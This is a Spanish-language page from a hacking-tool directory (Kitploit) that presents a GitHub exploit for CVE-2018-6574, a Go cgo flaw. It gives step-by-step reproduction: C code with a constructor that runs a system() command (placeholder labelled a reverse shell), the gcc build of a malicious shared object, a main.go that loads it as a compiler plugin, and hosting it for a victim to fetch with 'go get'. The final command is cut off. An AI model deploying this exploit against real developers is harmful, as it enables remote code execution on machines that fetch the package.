Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-6574 — Exploit en Golang cgo para CVE-2018-6574 | Kitploit
Herramientas/GitHubGitHub/paulogmota/cve-2018-6574
Análisis de VulnerabilidadesExplotaciónShellcodePruebas de PenetraciónDesarrollo de PayloadsExplotación de Binarios
GitHubpaulogmota/cve-2018-6574

CVE-2018-6574

Exploit en Golang cgo para CVE-2018-6574

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-6574

Pasos para reproducir:

  1. Crea un archivo .c que contenga el comando malicioso (revshell):
root@kitploit:~
#include<stdio.h>
#include<stdlib.h>

static void malicious() __attribute__((constructor));

void malicious() {
  system("<insert your command here>");
}
  1. Compílalo usando GCC. Debes compilarlo en la misma arquitectura y sistema operativo que el objetivo (por ejemplo, Linux x86_64):
root@kitploit:~
gcc -shared -o attack.so -fPIC attack.c
  1. Crea un archivo main.go que contenga cabeceras que le indiquen a Go que use nuestro plugin malicioso:
root@kitploit:~
package main
// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int bridge_int_func(intFunc f){
//   return f();
// }
//
// int fortytwo(){
//   return 42;
// }
import "C"
import "fmt"

func main() {
    f := C.intFunc(C.fortytwo)
    fmt.Println(int(C.bridge_int_func(f)))
    // Output: 42
}
  1. Aloja los archivos main.go y attack.so en un repositorio de GitHub
Descargar herramienta
  • En la máquina objetivo, ejecuta el comando `go get github.com//
  • Sé feliz